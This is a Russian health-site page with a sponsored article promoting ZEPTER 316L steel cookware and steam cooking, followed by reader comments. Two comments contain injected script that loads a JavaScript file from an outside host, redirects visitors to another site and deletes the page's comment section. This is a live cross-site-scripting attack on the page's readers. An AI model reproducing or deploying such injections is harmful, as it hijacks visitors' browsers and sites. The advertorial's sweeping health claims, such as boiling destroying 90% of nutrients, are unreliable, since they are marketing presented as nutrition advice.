Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Здоровая еда начинается с...  >>  Здоровая еда начинается с правильной посуды
 
Обратная связь
 

Здоровая еда начинается с правильной посуды

Размер шрифта
01 апреля 2014 00:00
  • google_analytics: false
  • Нравится

Сторонники здорового образа жизни большое внимание уделяют выбору качественных и натуральных продуктов. Для правильного питания это, конечно, необходимо. Но недостаточно! Ведь даже самый замечательный и полезный кабачок после жарки на масле может растерять все свои витамины. По-настоящему здоровую еду можно приготовить только «здоровым» способом в правильной посуде. Какой же она должна быть?

Здоровая еда начинается с правильной посуды

Размышления о приготовлении

Тот, кто стремится правильно питаться, никогда не станет жарить продукты в большом количестве масла. Ведь известно, что перегретые жиры не только разрушают питательную и биологическую ценность пищи, но к тому же выделяют трансизомеры жирных кислот, которые крайне опасны для здоровья. Так что сковородок в арсенале поклонников правильного питания практически нет.

Могут ли традиционные кастрюли обеспечить приготовление здоровой пищи? Оказывается, тоже нет. Кипящая вода разрушает до 90% питательных веществ, которые содержатся в продуктах. Из-за этого еда не только лишается всякой пользы, но и становится безвкусной, изменяются ее цвет, форма, структура и аромат. Чтобы хоть немного улучшить вкусовые показатели, приходится добавлять в блюдо соль и специи, которые также не приносят пользу здоровью. Между тем в овощах, фруктах и даже в мясе достаточно жидкости и собственных минералов, благодаря чему можно готовить пищу «в собственном соку» с сохранением натурального вкуса и без добавления воды, жира, соли и специй. Вот только посуда для такого способа приготовления должна быть изготовлена из материала с особыми свойствами.

Введение в материаловедение

Алюминий уже давно уволен с кухни каждого сторонника здорового питания, так как этот металл легко окисляется и в целом вреден для здоровья. Эмалированные кастрюли разочаровали хозяек своей недолговечностью: на них очень быстро появляются сколы, из-за которых посуду нельзя дальше использовать. Традиционный чугун хрупок и часто покрывается ржавчиной. Посуда с керамическим или тефлоновым покрытием тоже имеет ограниченный срок эксплуатации, потому что любое покрытие со временем имеет свойство отслаиваться. Совсем другое дело, если корпус посуды выполнен не из склеенных или спаянных элементов, а из спрессованных слоев одного и того же прочного металла. Важно, чтобы посуда имела толстое дно, которое будет равномерно распределять тепло, чтобы пища не подгорала. Металл для изготовления качественной посуды должен быть абсолютно нейтрален, долговечен, устойчив к химическим и физическим воздействиям. Такими характеристиками обладает, например, металл 316 L (сплав хрома, никеля и молибдена). Этот металл широко применяется в медицине для производства хирургических инструментов, имплантатов и протезов. Несмотря на выдающиеся характеристики прочности и долговечности, в производстве посуды он практически не используется в силу своей дороговизны. Одна из немногих компаний, которая все-таки отдает предпочтение именно металлу 316 L для производства своей фирменной посуды – это компания ZEPTER

Здоровая еда начинается с правильной посуды

С легким паром!

На пару можно приготовить практически любые продукты, кроме бобовых, макарон, грибов и субпродуктов.

Основный залог успеха паровых блюд – свежие, качественные ингредиенты: ни пароварка, ни скороварка, ни другая самая современная посуда не сможет «подправить» изъяны перезревших фруктов или жилистого мяса.

Солить блюда не обязательно: их естественный вкус в пароварке сохраняется и становится даже ярче. Если это необходимо, лучше добавить немного соли уже в готовое блюдо.

Подводя итог, можно смело сказать, что благодаря инновациям в мире посуды, готовить быстро, вкусно и полезно теперь совсем несложно. Главное – сделать правильный выбор: отдавать предпочтение продукции известного крупного производителя, репутация которого является гарантией качества вашей покупки. Узнайте больше о правильных способах приготовления пищи для более долгой и здоровой жизни на официальном сайте компании ZEPTER International .

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

08 апреля 2014 в 09:37

Цитировать   |   Пожаловаться

а разве малибден не радиоактивное вещество? при нагреве такой кастрюльки мы сами не не навредим?

Гость 08 апреля 2014 в 09:37
а разве малибден не радиоактивное вещество? при нагреве такой кастрюльки мы сами не не навредим?
 Молибден - не радиоактивный элемент. При нагревании сплава ни одно вещество сплава не выделяется, в пище не присутствует. 

3 - zzzzzz

30 июня 2015 в 18:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Блендеры и миксеры таят в себе страшного микроба, от которого не могут избавиться никакие средства! Что делать?   Как есть настоящую еду   Обычная витаминка против старости!   Сохранять молодость – значит делать выбор в пользу здорового питания  
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Супереда, которую вы не едите для здоровья и похудения
Как есть меньше без усилий
Как похудеть ничего не делая?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.